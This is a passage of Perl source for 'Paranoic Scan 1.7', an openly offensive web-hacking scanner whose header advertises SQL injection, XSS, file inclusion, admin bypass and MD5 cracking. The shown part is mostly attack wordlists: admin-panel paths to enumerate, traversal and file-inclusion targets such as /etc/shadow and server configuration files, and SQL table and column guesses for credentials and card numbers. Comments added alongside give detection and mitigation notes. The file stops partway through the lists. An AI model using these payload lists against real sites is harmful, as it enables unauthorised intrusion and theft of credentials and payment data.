1 | #!usr/bin/perl | |
2 | ################################################################################# | |
3 | #This software is Copyright (c) 2014 by Doddy Hackman. | |
4 | # | |
5 | #This is free software, licensed under: | |
6 | # | |
7 | # The Artistic License 1.0 | |
8 | # | |
9 | #The Artistic License | |
10 | # | |
11 | #Preamble | |
12 | # | |
13 | #The intent of this document is to state the conditions under which a Package | |
14 | #may be copied, such that the Copyright Holder maintains some semblance of | |
15 | #artistic control over the development of the package, while giving the users of | |
16 | #the package the right to use and distribute the Package in a more-or-less | |
17 | #customary fashion, plus the right to make reasonable modifications. | |
18 | # | |
19 | #Definitions: | |
20 | # | |
21 | # - "Package" refers to the collection of files distributed by the Copyright | |
22 | # Holder, and derivatives of that collection of files created through | |
23 | # textual modification. | |
24 | # - "Standard Version" refers to such a Package if it has not been modified, | |
25 | # or has been modified in accordance with the wishes of the Copyright | |
26 | # Holder. | |
27 | # - "Copyright Holder" is whoever is named in the copyright or copyrights for | |
28 | # the package. | |
29 | # - "You" is you, if you're thinking about copying or distributing this Package. | |
30 | # - "Reasonable copying fee" is whatever you can justify on the basis of media | |
31 | # cost, duplication charges, time of people involved, and so on. (You will | |
32 | # not be required to justify it to the Copyright Holder, but only to the | |
33 | # computing community at large as a market that must bear the fee.) | |
34 | # - "Freely Available" means that no fee is charged for the item itself, though | |
35 | # there may be fees involved in handling the item. It also means that | |
36 | # recipients of the item may redistribute it under the same conditions they | |
37 | # received it. | |
38 | # | |
39 | #1. You may make and give away verbatim copies of the source form of the | |
40 | #Standard Version of this Package without restriction, provided that you | |
41 | #duplicate all of the original copyright notices and associated disclaimers. | |
42 | # | |
43 | #2. You may apply bug fixes, portability fixes and other modifications derived | |
44 | #from the Public Domain or from the Copyright Holder. A Package modified in such | |
45 | #a way shall still be considered the Standard Version. | |
46 | # | |
47 | #3. You may otherwise modify your copy of this Package in any way, provided that | |
48 | #you insert a prominent notice in each changed file stating how and when you | |
49 | #changed that file, and provided that you do at least ONE of the following: | |
50 | # | |
51 | # a) place your modifications in the Public Domain or otherwise make them | |
52 | # Freely Available, such as by posting said modifications to Usenet or an | |
53 | # equivalent medium, or placing the modifications on a major archive site | |
54 | # such as ftp.uu.net, or by allowing the Copyright Holder to include your | |
55 | # modifications in the Standard Version of the Package. | |
56 | # | |
57 | # b) use the modified Package only within your corporation or organization. | |
58 | # | |
59 | # c) rename any non-standard executables so the names do not conflict with | |
60 | # standard executables, which must also be provided, and provide a separate | |
61 | # manual page for each non-standard executable that clearly documents how it | |
62 | # differs from the Standard Version. | |
63 | # | |
64 | # d) make other distribution arrangements with the Copyright Holder. | |
65 | # | |
66 | #4. You may distribute the programs of this Package in object code or executable | |
67 | #form, provided that you do at least ONE of the following: | |
68 | # | |
69 | # a) distribute a Standard Version of the executables and library files, | |
70 | # together with instructions (in the manual page or equivalent) on where to | |
71 | # get the Standard Version. | |
72 | # | |
73 | # b) accompany the distribution with the machine-readable source of the Package | |
74 | # with your modifications. | |
75 | # | |
76 | # c) accompany any non-standard executables with their corresponding Standard | |
77 | # Version executables, giving the non-standard executables non-standard | |
78 | # names, and clearly documenting the differences in manual pages (or | |
79 | # equivalent), together with instructions on where to get the Standard | |
80 | # Version. | |
81 | # | |
82 | # d) make other distribution arrangements with the Copyright Holder. | |
83 | # | |
84 | #5. You may charge a reasonable copying fee for any distribution of this | |
85 | #Package. You may charge any fee you choose for support of this Package. You | |
86 | #may not charge a fee for this Package itself. However, you may distribute this | |
87 | #Package in aggregate with other (possibly commercial) programs as part of a | |
88 | #larger (possibly commercial) software distribution provided that you do not | |
89 | #advertise this Package as a product of your own. | |
90 | # | |
91 | #6. The scripts and library files supplied as input to or produced as output | |
92 | #from the programs of this Package do not automatically fall under the copyright | |
93 | #of this Package, but belong to whomever generated them, and may be sold | |
94 | #commercially, and may be aggregated with this Package. | |
95 | # | |
96 | #7. C or perl subroutines supplied by you and linked into this Package shall not | |
97 | #be considered part of this Package. | |
98 | # | |
99 | #8. The name of the Copyright Holder may not be used to endorse or promote | |
100 | #products derived from this software without specific prior written permission. | |
101 | # | |
102 | #9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED | |
103 | #WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF | |
104 | #MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. | |
105 | # | |
106 | #The End | |
107 | ################################################################################# | |
108 | #Paranoic Scan 1.7 | |
109 | #(C) Doddy Hackman 2014 | |
110 | #Necessary modules | |
111 | #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm | |
112 | #ppm install http://trouchelle.com/ppm/Color-Output.ppd | |
113 | #ppm install http://www.eekboek.nl/dl/ppms/Crypt-SSLeay.ppd | |
114 | #http://search.cpan.org/~exiftool/Image-ExifTool-9.27/lib/Image/ExifTool.pod | |
115 | #ppm install http://trouchelle.com/ppm/Image-ExifTool.ppd | |
116 | #http://search.cpan.org/~timb/DBI-1.630/DBI.pm | |
117 | #http://search.cpan.org/~capttofu/DBD-mysql-4.025/lib/DBD/mysql.pm | |
118 | #The arrays are a collection of several I found on the web | |
119 | # | |
120 | #[++] Old Options | |
121 | # | |
122 | #Google & Bing Scanner that also scan : | |
123 | # | |
124 | # * XSS | |
125 | # * SQL GET / POST | |
126 | # * SQL GET | |
127 | # * SQL GET + Admin | |
128 | # * Directory listing | |
129 | # * MSSQL | |
130 | # * Jet Database | |
131 | # * Oracle | |
132 | # * LFI | |
133 | # * RFI | |
134 | # * Full Source Disclosure | |
135 | # * HTTP Information | |
136 | # * SQLi Scanner | |
137 | # * Bypass Admin | |
138 | # * Exploit FSD Manager | |
139 | # * Paths Finder | |
140 | # * Locate IP | |
141 | # * Crack MD5 | |
142 | # * Panel Finder | |
143 | # * Console | |
144 | # | |
145 | #[++] Fixes | |
146 | # | |
147 | #[+] Refresh of existing pages to crack md5 | |
148 | #[+] Error scanner fsd | |
149 | #[+] Http error scanner scan | |
150 | #[+] Spaces between text too annoying | |
151 | #[+] Added array to bypass | |
152 | #[+] Failed to read from file | |
153 | #[+] Fixed google & bing scanner | |
154 | # | |
155 | #[++] New options | |
156 | # | |
157 | #[+] Generate all logs in a html file | |
158 | #[+] Incorporates random and new useragent | |
159 | #[+] Multi encoder / decoder : | |
160 | # | |
161 | # * Ascii | |
162 | # * Hex | |
163 | # * Url | |
164 | # * Bin To Text & Text To Bin | |
165 | # | |
166 | #[+] PortScanner | |
167 | #[+] HTTP FingerPrinting | |
168 | #[+] CSRF Tool | |
169 | #[+] Scan XSS | |
170 | #[+] Generator for XSS Bypass | |
171 | #[+] Generator of tiny URL links | |
172 | #[+] Finder and downloader exploits on Exploit-DB | |
173 | #[+] Mysql Manager | |
174 | #[+] Tools LFI | |
175 | # | |
176 | ################################################################################# | |
177 | ||
# Module loading and output setup for the script.
# NOTE(review): no `use strict;` / `use warnings;` appears among the visible
# pragmas, so typos in variable names will not be caught at compile time.
# URI::Escape and HTML::Form are each loaded twice below; the second `use` of
# an already-loaded module is harmless.
use Color::Output;
Color::Output::Init;    # must run before any coloured output is printed
use LWP::UserAgent;     # HTTP client
use URI::Escape;
use IO::Socket;
use URI::Split qw(uri_split);
use URI::Escape;
use File::Basename;
use HTML::Form;
use HTML::Parser;
use HTML::LinkExtor;
use HTML::Form;
use Time::HiRes "usleep";
use Image::ExifTool;
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
use DBI;                # database access
use Cwd;

$|++;    # enable autoflush on the currently selected output handle
198 | ||
199 | ## | |
200 | ||
201 | ##Arrays | |
202 | ||
# Pool of browser User-Agent strings. The header changelog mentions a
# "random and new useragent" feature, so presumably one entry is chosen per
# request; the selection code is outside this excerpt (TODO confirm).
# Detection note: the pool is fixed and dated (Firefox 25, Opera 12.14, MSIE),
# and one entry is malformed ("WIndows NT 9.0" followed by a doubled ")"), so
# these exact strings are usable as web-log signatures. Because the value can
# change between requests, User-Agent alone is a weak key for rate limiting or
# for attributing a burst of requests to one client.
my @agents = (
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0',
    'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
    'Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1',
    'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
    'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14',
    'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27'
);
213 | ||
# Relative paths of common administration and login pages (ASP, ASPX, PHP,
# HTML and bare directories, with names in several languages). Presumably
# consumed by the "Panel Finder" option listed in the header, which would
# request each path under a base URL; that code is outside this excerpt.
# Detection note: one client requesting many of these paths in a short
# window, mostly answered with 404, is a strong sign of panel enumeration.
# Mitigation note: an administration interface should be protected by
# authentication and network restriction, never by an unusual path alone.
my @paneles = (
    'admin/admin.asp', 'admin/login.asp',
    'admin/index.asp', 'admin/admin.aspx',
    'admin/login.aspx', 'admin/index.aspx',
    'admin/webmaster.asp', 'admin/webmaster.aspx',
    'asp/admin/index.asp', 'asp/admin/index.aspx',
    'asp/admin/admin.asp', 'asp/admin/admin.aspx',
    'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx',
    'admin/', 'login.asp',
    'login.aspx', 'admin.asp',
    'admin.aspx', 'webmaster.aspx',
    'webmaster.asp', 'login/index.asp',
    'login/index.aspx', 'login/login.asp',
    'login/login.aspx', 'login/admin.asp',
    'login/admin.aspx', 'administracion/index.asp',
    'administracion/index.aspx', 'administracion/login.asp',
    'administracion/login.aspx', 'administracion/webmaster.asp',
    'administracion/webmaster.aspx', 'administracion/admin.asp',
    'administracion/admin.aspx', 'php/admin/',
    'admin/admin.php', 'admin/index.php',
    'admin/login.php', 'admin/system.php',
    'admin/ingresar.php', 'admin/administrador.php',
    'admin/default.php', 'administracion/',
    'administracion/index.php', 'administracion/login.php',
    'administracion/ingresar.php', 'administracion/admin.php',
    'administration/', 'administration/index.php',
    'administration/login.php', 'administrator/index.php',
    'administrator/login.php', 'administrator/system.php',
    'system/', 'system/login.php',
    'admin.php', 'login.php',
    'administrador.php', 'administration.php',
    'administrator.php', 'admin1.html',
    'admin1.php', 'admin2.php',
    'admin2.html', 'yonetim.php',
    'yonetim.html', 'yonetici.php',
    'yonetici.html', 'adm/',
    'admin/account.php', 'admin/account.html',
    'admin/index.html', 'admin/login.html',
    'admin/home.php', 'admin/controlpanel.html',
    'admin/controlpanel.php', 'admin.html',
    'admin/cp.php', 'admin/cp.html',
    'cp.php', 'cp.html',
    'administrator/', 'administrator/index.html',
    'administrator/login.html', 'administrator/account.html',
    'administrator/account.php', 'administrator.html',
    'login.html', 'modelsearch/login.php',
    'moderator.php', 'moderator.html',
    'moderator/login.php', 'moderator/login.html',
    'moderator/admin.php', 'moderator/admin.html',
    'moderator/', 'account.php',
    'account.html', 'controlpanel/',
    'controlpanel.php', 'controlpanel.html',
    'admincontrol.php', 'admincontrol.html',
    'adminpanel.php', 'adminpanel.html',
    'admin1.asp', 'admin2.asp',
    'yonetim.asp', 'yonetici.asp',
    'admin/account.asp', 'admin/home.asp',
    'admin/controlpanel.asp', 'admin/cp.asp',
    'cp.asp', 'administrator/index.asp',
    'administrator/login.asp', 'administrator/account.asp',
    'administrator.asp', 'modelsearch/login.asp',
    'moderator.asp', 'moderator/login.asp',
    'moderator/admin.asp', 'account.asp',
    'controlpanel.asp', 'admincontrol.asp',
    'adminpanel.asp', 'fileadmin/',
    'fileadmin.php', 'fileadmin.asp',
    'fileadmin.html', 'administration.html',
    'sysadmin.php', 'sysadmin.html',
    'phpmyadmin/', 'myadmin/',
    'sysadmin.asp', 'sysadmin/',
    'ur-admin.asp', 'ur-admin.php',
    'ur-admin.html', 'ur-admin/',
    'Server.php', 'Server.html',
    'Server.asp', 'Server/',
    'wp-admin/', 'administr8.php',
    'administr8.html', 'administr8/',
    'administr8.asp', 'webadmin/',
    'webadmin.php', 'webadmin.asp',
    'webadmin.html', 'administratie/',
    'admins/', 'admins.php',
    'admins.asp', 'admins.html',
    'administrivia/', 'Database_Administration/',
    'WebAdmin/', 'useradmin/',
    'sysadmins/', 'admin1/',
    'system-administration/', 'administrators/',
    'pgadmin/', 'directadmin/',
    'staradmin/', 'ServerAdministrator/',
    'SysAdmin/', 'administer/',
    'LiveUser_Admin/', 'sys-admin/',
    'typo3/', 'panel/',
    'cpanel/', 'cPanel/',
    'cpanel_file/', 'platz_login/',
    'rcLogin/', 'blogindex/',
    'formslogin/', 'autologin/',
    'support_login/', 'meta_login/',
    'manuallogin/', 'simpleLogin/',
    'loginflat/', 'utility_login/',
    'showlogin/', 'memlogin/',
    'members/', 'login-redirect/',
    'sub-login/', 'wp-login/',
    'login1/', 'dir-login/',
    'login_db/', 'xlogin/',
    'smblogin/', 'customer_login/',
    'UserLogin/', 'login-us/',
    'acct_login/', 'admin_area/',
    'bigadmin/', 'project-admins/',
    'phppgadmin/', 'pureadmin/',
    'sql-admin/', 'radmind/',
    'openvpnadmin/', 'wizmysqladmin/',
    'vadmind/', 'ezsqliteadmin/',
    'hpwebjetadmin/', 'newsadmin/',
    'adminpro/', 'Lotus_Domino_Admin/',
    'bbadmin/', 'vmailadmin/',
    'Indy_admin/', 'ccp14admin/',
    'irc-macadmin/', 'banneradmin/',
    'sshadmin/', 'phpldapadmin/',
    'macadmin/', 'administratoraccounts/',
    'admin4_account/', 'admin4_colon/',
    'radmind-1/', 'Super-Admin/',
    'AdminTools/', 'cmsadmin/',
    'SysAdmin2/', 'globes_admin/',
    'cadmins/', 'phpSQLiteAdmin/',
    'navSiteAdmin/', 'server_admin_small/',
    'logo_sysadmin/', 'server/',
    'database_administration/', 'power_user/',
    'system_administration/', 'ss_vms_admin_sm/'
);
341 | ||
342 | #my @files = ("/opt/lampp/htdocs/fofo.txt","/opt/lampp/htdocs/fofo.txt"); | |
343 | ||
# Candidate local file paths: XAMPP test files, "../" traversal sequences
# ending in boot.ini, and Unix, Windows and macOS locations of account files
# and of web-server, PHP, MySQL, cPanel, FTP and mail configuration and logs.
# Presumably supplied as the value of a file-inclusion parameter by the LFI
# options listed in the header; the code that uses the list is outside this
# excerpt (TODO confirm).
# The strings are single-quoted, so the backslashes in the Windows paths are
# kept literally.
# Detection note: request parameters that carry these paths or runs of "../"
# are worth alerting on in web and WAF logs.
# Mitigation note: resolve include/read targets against an allowlist, and keep
# configuration and log files unreadable to the web application account.
my @files = (
    'C:/xampp/htdocs/aca.txt',
    '../lfi.php',
    'C:/xampp/htdocs/admin.php',
    'C:/xampp/htdocs/leer.txt',
    '../../../boot.ini',
    '../../../../boot.ini',
    '../../../../../boot.ini',
    '../../../../../../boot.ini',
    '/etc/passwd',
    '/etc/shadow',
    '/etc/shadow~',
    '/etc/hosts',
    '/etc/motd',
    '/etc/apache/apache.conf',
    '/etc/fstab',
    '/etc/apache2/apache2.conf',
    '/etc/apache/httpd.conf',
    '/etc/httpd/conf/httpd.conf',
    '/etc/apache2/httpd.conf',
    '/etc/apache2/sites-available/default',
    '/etc/mysql/my.cnf',
    '/etc/my.cnf',
    '/etc/sysconfig/network-scripts/ifcfg-eth0',
    '/etc/redhat-release',
    '/etc/httpd/conf.d/php.conf',
    '/etc/pam.d/proftpd',
    '/etc/phpmyadmin/config.inc.php',
    '/var/www/config.php',
    '/etc/httpd/logs/error_log',
    '/etc/httpd/logs/error.log',
    '/etc/httpd/logs/access_log',
    '/etc/httpd/logs/access.log',
    '/var/log/apache/error_log',
    '/var/log/apache/error.log',
    '/var/log/apache/access_log',
    '/var/log/apache/access.log',
    '/var/log/apache2/error_log',
    '/var/log/apache2/error.log',
    '/var/log/apache2/access_log',
    '/var/log/apache2/access.log',
    '/var/www/logs/error_log',
    '/var/www/logs/error.log',
    '/var/www/logs/access_log',
    '/var/www/logs/access.log',
    '/usr/local/apache/logs/error_log',
    '/usr/local/apache/logs/error.log',
    '/usr/local/apache/logs/access_log',
    '/usr/local/apache/logs/access.log',
    '/var/log/error_log',
    '/var/log/error.log',
    '/var/log/access_log',
    '/var/log/access.log',
    '/etc/group',
    '/etc/security/group',
    '/etc/security/passwd',
    '/etc/security/user',
    '/etc/security/environ',
    '/etc/security/limits',
    '/usr/lib/security/mkuser.default',
    '/apache/logs/access.log',
    '/apache/logs/error.log',
    '/etc/httpd/logs/acces_log',
    '/etc/httpd/logs/acces.log',
    '/var/log/httpd/access_log',
    '/var/log/httpd/error_log',
    '/apache2/logs/error.log',
    '/apache2/logs/access.log',
    '/logs/error.log',
    '/logs/access.log',
    '/usr/local/apache2/logs/access_log',
    '/usr/local/apache2/logs/access.log',
    '/usr/local/apache2/logs/error_log',
    '/usr/local/apache2/logs/error.log',
    '/var/log/httpd/access.log',
    '/var/log/httpd/error.log',
    '/opt/lampp/logs/access_log',
    '/opt/lampp/logs/error_log',
    '/opt/xampp/logs/access_log',
    '/opt/xampp/logs/error_log',
    '/opt/lampp/logs/access.log',
    '/opt/lampp/logs/error.log',
    '/opt/xampp/logs/access.log',
    '/opt/xampp/logs/error.log',
    'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
    'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
    '/usr/local/apache/conf/httpd.conf',
    '/usr/local/apache2/conf/httpd.conf',
    '/etc/apache/conf/httpd.conf',
    '/usr/local/etc/apache/conf/httpd.conf',
    '/usr/local/apache/httpd.conf',
    '/usr/local/apache2/httpd.conf',
    '/usr/local/httpd/conf/httpd.conf',
    '/usr/local/etc/apache2/conf/httpd.conf',
    '/usr/local/etc/httpd/conf/httpd.conf',
    '/usr/apache2/conf/httpd.conf',
    '/usr/apache/conf/httpd.conf',
    '/usr/local/apps/apache2/conf/httpd.conf',
    '/usr/local/apps/apache/conf/httpd.conf',
    '/etc/apache2/conf/httpd.conf',
    '/etc/http/conf/httpd.conf',
    '/etc/httpd/httpd.conf',
    '/etc/http/httpd.conf',
    '/etc/httpd.conf',
    '/opt/apache/conf/httpd.conf',
    '/opt/apache2/conf/httpd.conf',
    '/var/www/conf/httpd.conf',
    '/private/etc/httpd/httpd.conf',
    '/private/etc/httpd/httpd.conf.default',
    '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
    '/Volumes/webBackup/private/etc/httpd/httpd.conf',
    '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
    'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
    'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
    'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
    '/usr/local/php/httpd.conf.php',
    '/usr/local/php4/httpd.conf.php',
    '/usr/local/php5/httpd.conf.php',
    '/usr/local/php/httpd.conf',
    '/usr/local/php4/httpd.conf',
    '/usr/local/php5/httpd.conf',
    '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
    '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
    '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
    '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
    '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
    '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
    '/usr/local/etc/apache/vhosts.conf',
    '/etc/php.ini',
    '/bin/php.ini',
    '/etc/httpd/php.ini',
    '/usr/lib/php.ini',
    '/usr/lib/php/php.ini',
    '/usr/local/etc/php.ini',
    '/usr/local/lib/php.ini',
    '/usr/local/php/lib/php.ini',
    '/usr/local/php4/lib/php.ini',
    '/usr/local/php5/lib/php.ini',
    '/usr/local/apache/conf/php.ini',
    '/etc/php4.4/fcgi/php.ini',
    '/etc/php4/apache/php.ini',
    '/etc/php4/apache2/php.ini',
    '/etc/php5/apache/php.ini',
    '/etc/php5/apache2/php.ini',
    '/etc/php/php.ini',
    '/etc/php/php4/php.ini',
    '/etc/php/apache/php.ini',
    '/etc/php/apache2/php.ini',
    '/web/conf/php.ini',
    '/usr/local/Zend/etc/php.ini',
    '/opt/xampp/etc/php.ini',
    '/var/local/www/conf/php.ini',
    '/etc/php/cgi/php.ini',
    '/etc/php4/cgi/php.ini',
    '/etc/php5/cgi/php.ini',
    'c:\php5\php.ini',
    'c:\php4\php.ini',
    'c:\php\php.ini',
    'c:\PHP\php.ini',
    'c:\WINDOWS\php.ini',
    'c:\WINNT\php.ini',
    'c:\apache\php\php.ini',
    'c:\xampp\apache\bin\php.ini',
    'c:\NetServer\bin\stable\apache\php.ini',
    'c:\home2\bin\stable\apache\php.ini',
    'c:\home\bin\stable\apache\php.ini',
    '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
    '/usr/local/cpanel/logs',
    '/usr/local/cpanel/logs/stats_log',
    '/usr/local/cpanel/logs/access_log',
    '/usr/local/cpanel/logs/error_log',
    '/usr/local/cpanel/logs/license_log',
    '/usr/local/cpanel/logs/login_log',
    '/var/cpanel/cpanel.config',
    '/var/log/mysql/mysql-bin.log',
    '/var/log/mysql.log',
    '/var/log/mysqlderror.log',
    '/var/log/mysql/mysql.log',
    '/var/log/mysql/mysql-slow.log',
    '/var/mysql.log',
    '/var/lib/mysql/my.cnf',
    'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
    'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
    'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
    'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
    'C:\ProgramFiles\MySQL\data\hostname.err',
    'C:\ProgramFiles\MySQL\data\mysql.log',
    'C:\ProgramFiles\MySQL\data\mysql.err',
    'C:\ProgramFiles\MySQL\data\mysql-bin.log',
    'C:\MySQL\data\hostname.err',
    'C:\MySQL\data\mysql.log',
    'C:\MySQL\data\mysql.err',
    'C:\MySQL\data\mysql-bin.log',
    'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
    'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
    'C:\ProgramFiles\MySQL\my.ini',
    'C:\ProgramFiles\MySQL\my.cnf',
    'C:\MySQL\my.ini',
    'C:\MySQL\my.cnf',
    '/etc/logrotate.d/proftpd',
    '/www/logs/proftpd.system.log',
    '/var/log/proftpd',
    '/etc/proftp.conf',
    '/etc/protpd/proftpd.conf',
    '/etc/vhcs2/proftpd/proftpd.conf',
    '/etc/proftpd/modules.conf',
    '/var/log/vsftpd.log',
    '/etc/vsftpd.chroot_list',
    '/etc/logrotate.d/vsftpd.log',
    '/etc/vsftpd/vsftpd.conf',
    '/etc/vsftpd.conf',
    '/etc/chrootUsers',
    '/var/log/xferlog',
    '/var/adm/log/xferlog',
    '/etc/wu-ftpd/ftpaccess',
    '/etc/wu-ftpd/ftphosts',
    '/etc/wu-ftpd/ftpusers',
    '/usr/sbin/pure-config.pl',
    '/usr/etc/pure-ftpd.conf',
    '/etc/pure-ftpd/pure-ftpd.conf',
    '/usr/local/etc/pure-ftpd.conf',
    '/usr/local/etc/pureftpd.pdb',
    '/usr/local/pureftpd/etc/pureftpd.pdb',
    '/usr/local/pureftpd/sbin/pure-config.pl',
    '/usr/local/pureftpd/etc/pure-ftpd.conf',
    '/etc/pure-ftpd/pure-ftpd.pdb',
    '/etc/pureftpd.pdb',
    '/etc/pureftpd.passwd',
    '/etc/pure-ftpd/pureftpd.pdb',
    '/var/log/pure-ftpd/pure-ftpd.log',
    '/logs/pure-ftpd.log',
    '/var/log/pureftpd.log',
    '/var/log/ftp-proxy/ftp-proxy.log',
    '/var/log/ftp-proxy',
    '/var/log/ftplog',
    '/etc/logrotate.d/ftp',
    '/etc/ftpchroot',
    '/etc/ftphosts',
    '/var/log/exim_mainlog',
    '/var/log/exim/mainlog',
    '/var/log/maillog',
    '/var/log/exim_paniclog',
    '/var/log/exim/paniclog',
    '/var/log/exim/rejectlog',
    '/var/log/exim_rejectlog'
);
# Candidate identifier names, mixing what look like table names and column
# names in several languages ("buscar" is Spanish for "to search").
# Presumably used by the SQL options listed in the header to guess schema
# names; the consuming code is outside this excerpt (TODO confirm).
# The list is weighted toward account, credential and session data and also
# includes payment-card fields (cc_number, cc_expires, cvvnumber), which shows
# what kind of data such a scan looks for.
# Several entries contain a literal '?' where an accented character was
# probably lost in an encoding step; they are runtime strings and are kept
# exactly as found.
# Detection note: a run of failed queries naming many of these identifiers in
# sequence is a usable signal in database and application error logs.
# Mitigation note: parameterized queries and a least-privilege database
# account for the web application limit what such guessing can reach.
my @buscar1 = (
    'usuario', 'web_users',
    'name', 'names',
    'nombre', 'nombres',
    'usuarios', 'member',
    'members', 'admin_table',
    'usuaris', 'admin',
    'tblUsers', 'tblAdmin',
    'user', 'users',
    'username', 'usernames',
    'web_usuarios', 'miembro',
    'miembros', 'membername',
    'admins', 'administrator',
    'sign', 'config',
    'USUARIS', 'cms_operadores',
    'administrators', 'passwd',
    'password', 'passwords',
    'pass', 'Pass',
    'mpn_authors', 'author',
    'musuario', 'mysql.user',
    'user_names', 'foro',
    'tAdmin', 'tadmin',
    'user_password', 'user_passwords',
    'user_name', 'member_password',
    'mods', 'mod',
    'moderators', 'moderator',
    'user_email', 'jos_users',
    'mb_user', 'host',
    'apellido_nombre', 'user_emails',
    'user_mail', 'user_mails',
    'mail', 'emails',
    'email', 'address',
    'jos_usuarios', 'tutorial_user_auth',
    'e-mail', 'emailaddress',
    'correo', 'correos',
    'phpbb_users', 'log',
    'logins', 'login',
    'tbl_usuarios', 'user_auth',
    'login_radio', 'registers',
    'register', 'usr',
    'usrs', 'ps',
    'pw', 'un',
    'u_name', 'u_pass',
    'tbl_admin', 'usuarios_head',
    'tpassword', 'tPassword',
    'u_password', 'nick',
    'nicks', 'manager',
    'managers', 'administrador',
    'BG_CMS_Users', 'tUser',
    'tUsers', 'administradores',
    'clave', 'login_id',
    'pwd', 'pas',
    'sistema_id', 'foro_usuarios',
    'cliente', 'sistema_usuario',
    'sistema_password', 'contrasena',
    'auth', 'key',
    'senha', 'signin',
    'dir_admin', 'alias',
    'clientes', 'tb_admin',
    'tb_administrator', 'tb_login',
    'tb_logon', 'tb_members_tb_member',
    'calendar_users', 'cursos',
    'tb_users', 'tb_user',
    'tb_sys', 'sys',
    'fazerlogon', 'logon',
    'fazer', 'authorization',
    'curso', 'membros',
    'utilizadores', 'staff',
    'nuke_authors', 'accounts',
    'account', 'accnts',
    'signup', 'leads',
    'lead', 'associated',
    'accnt', 'customers',
    'customer', 'membres',
    'administrateur', 'utilisateur',
    'riacms_users', 'tuser',
    'tusers', 'utilisateurs',
    'amministratore', 'god',
    'God', 'authors',
    'wp_users', 'tb_usuarios',
    'asociado', 'asociados',
    'autores', 'autor',
    'Users', 'Admin',
    'Members', 'tb_usuario',
    'Miembros', 'Usuario',
    'Usuarios', 'ADMIN',
    'USERS', 'USER',
    'MEMBER', 'MEMBERS',
    'USUARIO', 'USUARIOS',
    'MIEMBROS', 'MIEMBRO',
    'USR_NAME', 'about',
    'access', 'admin_id',
    'admin_name', 'admin_pass',
    'admin_passwd', 'admin_password',
    'admin_pwd', 'admin_user',
    'admin_userid', 'admin_username',
    'adminemail', 'adminid',
    'administrator_name', 'adminlogin',
    'adminmail', 'adminname',
    'adminuser', 'adminuserid',
    'adminusername', 'aid',
    'aim', 'apwd',
    'auid', 'authenticate',
    'authentication', 'blog',
    'cc_expires', 'cc_number',
    'cc_owner', 'cc_type',
    'cfg', 'cid',
    'clientname', 'clientpassword',
    'clientusername', 'conf',
    'contact', 'converge_pass_hash',
    'converge_pass_salt', 'crack',
    'customers_email_address', 'customers_password',
    'cvvnumber]', 'data',
    'db_database_name', 'db_hostname',
    'db_password', 'db_username',
    'download', 'e_mail',
    'emer', 'emni',
    'emniplote', 'emri',
    'fjalekalimi', 'fjalekalimin',
    'full', 'gid',
    'group', 'group_name',
    'hash', 'hashsalt',
    'homepage', 'icq',
    'icq_number', 'id',
    'id_group', 'id_member',
    'images', 'ime',
    'index', 'ip_address',
    'kodi', 'korisnici',
    'korisnik', 'kpro_user',
    'last_ip', 'last_login',
    'lastname', 'llogaria',
    'login_admin', 'login_name',
    'login_pass', 'login_passwd',
    'login_password', 'login_pw',
    'login_pwd', 'login_user',
    'login_username', 'logini',
    'loginkey', 'loginout',
    'logo', 'logohu',
    'lozinka', 'md5hash',
    'mem_login', 'mem_pass',
    'mem_passwd', 'mem_password',
    'mem_pwd', 'member_id',
    'member_login_key', 'member_name',
    'memberid', 'memlogin',
    'mempassword', 'my_email',
    'my_name', 'my_password',
    'my_username', 'myname',
    'mypassword', 'myusername',
    'nc', 'new',
    'news', 'number',
    'nummer', 'p_assword',
    'p_word', 'pass_hash',
    'pass_w', 'pass_word',
    'pass1word', 'passw',
    'passwordsalt', 'passwort',
    'passwrd', 'perdorimi',
    'perdoruesi', 'personal_key',
    'phone', 'privacy',
    'psw', 'punetoret',
    'punonjes', 'pword',
    'pwrd', 'salt',
    'search', 'secretanswer',
    'search', 'secretanswer',
    'secretquestion', 'serial',
    'session_member_id', 'session_member_login_key',
    'sesskey', 'setting',
